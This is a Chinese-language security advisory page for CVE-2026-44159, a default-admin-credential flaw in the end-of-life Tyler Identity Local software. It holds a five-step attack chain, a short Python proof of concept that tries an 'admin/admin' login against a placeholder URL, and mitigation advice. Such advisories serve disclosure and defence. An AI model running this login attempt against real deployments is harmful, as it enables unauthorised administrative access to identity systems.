IPBUF安全漏洞报告
English
CVE-2026-44159 CVSS 9.8 严重

CVE-2026-44159 Tyler Identity Local默认凭证漏洞

披露日期: 2026-05-19
来源: 9119a7d8-5eab-497f-8521-727c672e3725

漏洞信息

漏洞编号
CVE-2026-44159
漏洞类型
默认凭证
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Tyler Identity Local (TID-L)

相关标签

默认凭证身份认证绕过Tyler Identity LocalTID-LEOL严重

漏洞概述

Tyler Identity Local (TID-L) 软件存在严重安全漏洞,该产品使用了文档中公开的默认管理员凭证,并且在部署过程中并未强制要求用户修改这些密码。由于该软件自2020年12月起已停止分发,且自2021年起停止技术支持,未及时修改默认凭证的遗留系统将面临极高的被攻击风险。

技术细节

该漏洞的根本原因在于 Tyler Identity Local (TID-L) 未能强制实施安全的初始化流程,允许系统在保留硬编码或文档化的默认管理员凭证下运行。攻击者无需任何用户交互或特权账号,即可通过网络直接访问目标系统的管理界面。通过尝试使用公开的默认凭证进行登录,攻击者能够绕过身份验证机制。一旦登录成功,攻击者将获得完全的管理员权限,从而能够读取机密信息、篡改系统完整性以及中断服务可用性。由于该产品已生命周期结束(EOL),官方不再提供安全更新,加剧了利用该漏洞的潜在危害。

攻击链分析

STEP 1
信息收集
攻击者扫描网络以发现开放的 Tyler Identity Local (TID-L) 管理服务端口。
STEP 2
访问接口
攻击者通过网络直接访问 TID-L 的管理登录页面。
STEP 3
尝试认证
攻击者利用公开文档中的默认管理员凭证(如 admin/admin)尝试登录。
STEP 4
权限获取
由于未修改默认密码,攻击者成功绕过认证,获得系统最高管理权限。
STEP 5
持久化与破坏
攻击者利用管理员权限窃取数据、修改配置或执行恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Placeholder) target_url = "http://target-tid-l-ip:port/login" # Default credentials typically found in documentation # Replace with actual credentials if known, otherwise common defaults payload = { "username": "admin", "password": "admin" } try: # Send login request response = requests.post(target_url, data=payload, timeout=10) # Check if login was successful (e.g., HTTP 200 + specific content) if response.status_code == 200 and "dashboard" in response.text.lower(): print("[+] Exploit Successful: Logged in with default credentials.") else: print("[-] Exploit Failed: Default credentials might be changed or endpoint incorrect.") except Exception as e: print(f"[!] Error occurred: {e}")

影响范围

Tyler Identity Local (TID-L) 所有版本(产品已停止分发)

防御指南

临时缓解措施
鉴于该软件已停止支持,最佳缓解措施是彻底停用并迁移至替代方案。若必须继续使用,务必立即修改所有默认凭证,并严格限制网络访问,仅允许受信任的内部IP地址连接管理界面。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表